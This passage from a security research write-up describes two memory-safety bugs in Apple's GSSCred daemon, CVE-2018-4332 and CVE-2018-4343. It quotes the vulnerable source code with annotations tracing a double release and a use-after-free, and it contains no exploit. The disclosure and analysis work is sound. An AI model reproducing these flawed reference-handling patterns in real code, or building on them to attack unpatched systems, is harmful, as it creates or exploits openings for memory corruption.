On iOS the story is a bit different. The GSSCred process enters the com.apple.GSSCred sandbox immediately on startup, which restricts it from doing most interesting things. The kernel attack surface from within the GSSCred sandbox does not appear significantly wider than from within the container sandbox. Thus, GSSCred may be a stepping-stone on a longer journey to unsandboxed code execution.

Bonus bugs

In addition to the main vulnerability caused by unexpected parallelism, GSSCred suffered from a few other issues as well. None of these seemed promising enough for me to want to invest the effort developing an exploit, but I’ll explain them here for completeness.

The first bonus bug is CVE-2018-4332, a double-CFRelease() in the do_CreateCred() function:

static void
do_CreateCred(struct peer *peer, xpc_object_t request, xpc_object_t reply)
{
    CFMutableDictionaryRef attrs = NULL;
    HeimCredRef cred = NULL;
    CFUUIDRef uuid = NULL;
    bool hasACL = false;
    CFErrorRef error = NULL;
    CFBooleanRef lead;

    /** 1. We create an attributes CFDictionary based on the request. All items should have
           refcount 1. **/
    CFDictionaryRef attributes = HeimCredMessageCopyAttributes(request, "attributes", CFDictionaryGetTypeID());
    if (attributes == NULL)
	goto out;

    if (!validateObject(attributes, &error)) {
	addErrorToReply(reply, error);
	goto out;
    }

    /* check if we are ok to link into this cred-tree */
    /** 2. The uuid object is borrowed from the attributes dictionary; no additional reference is
           added. **/
    uuid = CFDictionaryGetValue(attributes, kHEIMAttrParentCredential);
    /** 3. If uuid is non-NULL and checkACLInCredentialChain() returns false, then we branch to
           out. **/
    if (uuid != NULL && !checkACLInCredentialChain(peer, uuid, &hasACL))
	goto out;

    uuid = CFDictionaryGetValue(attributes, kHEIMAttrUUID);
    if (uuid) {
	CFRetain(uuid);

	if (CFGetTypeID(uuid) != CFUUIDGetTypeID())
	    goto out;

	if (CFDictionaryGetValue(peer->session->items, uuid) != NULL)
	    goto out;
	
    } else {
	uuid = CFUUIDCreate(NULL);
	if (uuid == NULL)
	    goto out;
    }
    cred = HeimCredCreateItem(uuid);
    if (cred == NULL)
	goto out;

    ...

out:
    CFRELEASE_NULL(attrs);
    /** 4. The attributes dict is freed. All the attributes were created with refcount 1, so they
           all get freed. In particular, uuid is freed, so the uuid variable is a dangling
           pointer. **/
    CFRELEASE_NULL(attributes);
    CFRELEASE_NULL(cred);
    /** 5. We CFRelease() uuid again, even though it was already freed above. **/
    CFRELEASE_NULL(uuid);
    CFRELEASE_NULL(error);
}

The problem is that uuid points to a borrowed value in some places and an owned value in others, and yet in both cases it is deallocated with CFRelease().

The second bonus bug is CVE-2018-4343, another use-after-free, this time in the function do_Move():

static void
do_Move(struct peer *peer, xpc_object_t request, xpc_object_t reply)
{
    /** 1. from and to are fully controlled UUID objects deserialized from the XPC request. **/
    CFUUIDRef from = HeimCredMessageCopyAttributes(request, "from", CFUUIDGetTypeID());
    CFUUIDRef to = HeimCredMessageCopyAttributes(request, "to", CFUUIDGetTypeID());

    if (from == NULL || to == NULL) {
	CFRELEASE_NULL(from);
	CFRELEASE_NULL(to);
	return;
    }

    if (!checkACLInCredentialChain(peer, from, NULL) || !checkACLInCredentialChain(peer, to, NULL)) {
	CFRelease(from);
	CFRelease(to);
	return;
    }

    /** 2. credfrom and credto are HeimCredRef objects looked up by the from and to UUIDs.
           CFDictionaryGetValue() returns the objects without adding a reference. Note that if
           the from and to UUIDs are the same, then credfrom and credto will both reference the
           same object. **/
    HeimCredRef credfrom = (HeimCredRef)CFDictionaryGetValue(peer->session->items, from);
    HeimCredRef credto = (HeimCredRef)CFDictionaryGetValue(peer->session->items, to);

    if (credfrom == NULL) {
	CFRelease(from);
	CFRelease(to);
	return;
    }

    /** 3. credfrom is removed from the dictionary. Since there was only one reference
           outstanding, this causes credfrom to be freed. **/
    CFMutableDictionaryRef newattrs = CFDictionaryCreateMutableCopy(NULL, 0, credfrom->attributes);
    CFDictionaryRemoveValue(peer->session->items, from);
    credfrom = NULL;

    CFDictionarySetValue(newattrs, kHEIMAttrUUID, to);

    /** 4. At this point we check credto. If credfrom and credto refer to the same object, then
           credto is a non-NULL pointer to the freed HeimCredRef object. **/
    if (credto == NULL) {
	...

    } else {
        /** 5. Now we dereference credto, passing a value read from freed memory as a
               CFDictionaryRef object to CFDictionaryGetValue(). **/
	CFUUIDRef parentUUID = CFDictionaryGetValue(credto->attributes, kHEIMAttrParentCredential);
	...
    }

    ...
}

The problem here is that the code does not consider the case when a "move" request attempts to move a credential to the same UUID as it already has. In this particular case, removing the old credential from the dictionary will also free the credto object before it is accessed.